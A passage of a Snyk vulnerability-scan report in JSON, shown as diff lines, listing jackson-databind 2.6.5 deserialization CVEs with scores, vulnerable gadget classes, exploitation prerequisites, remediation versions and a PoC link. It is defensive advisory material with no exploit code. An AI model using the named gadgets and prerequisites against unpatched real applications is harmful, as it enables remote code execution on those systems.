- }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:40.405517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:42.075545Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.574354Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.94931", - "probability": "0.10105", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14060" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-j823-4qch-3rgm" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T10:29:46.691157Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:23:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:46:13Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.574354Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.5)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2698", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.989304Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.681468Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.565244Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.91508", - "probability": "0.03404", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-14061" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-c2q3-4qrh-fm48" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-06-15T11:03:46.232208Z", - "functions_new": [ - { - "version": [ - "[,2.10.0)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-06-15T10:59:39Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-06-15T15:45:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:54.565244Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.2)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.9.2", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", - "title": "GitHub Comparison" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2387", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2389", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2395", - "title": "GitHub Issue" - }, - { - "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", - "title": "Snyk Blog" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:40.009523Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:46.065762Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:35.581531Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", - "epssDetails": { - "percentile": "0.45827", - "probability": "0.00116", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2019-14439" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-6fpp-rgj9-8rwc", - "GHSA-gwp4-hfv6-p7hw" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2023-11-14T13:41:26.478840Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2019-07-29T12:40:42Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2019-07-29T12:40:42Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:35.581531Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.6.7.4", - "2.9.10.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", - "className": "SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2814", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Kamimuka/cve-2020-24616-poc", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:04:03.282990Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:13.383929Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:47.311633Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", - "epssDetails": { - "percentile": "0.85138", - "probability": "0.01172", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-24616" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-08-26T11:28:06.617646Z", - "functions_new": [ - { - "version": [ - "[2.9.4,2.9.10.6)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", - "functionName": "validateSubType" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-08-26T11:26:14Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-08-26T14:27:29Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:47.311633Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.3)", - "[2.7.0,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.3", - "2.7.9.4", - "2.8.11.2", - "2.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.7.9.4)", - "[2.8.0,2.8.11.2)", - "[2.9.0,2.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2052", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:45.496040Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:41.204259Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.643590Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through 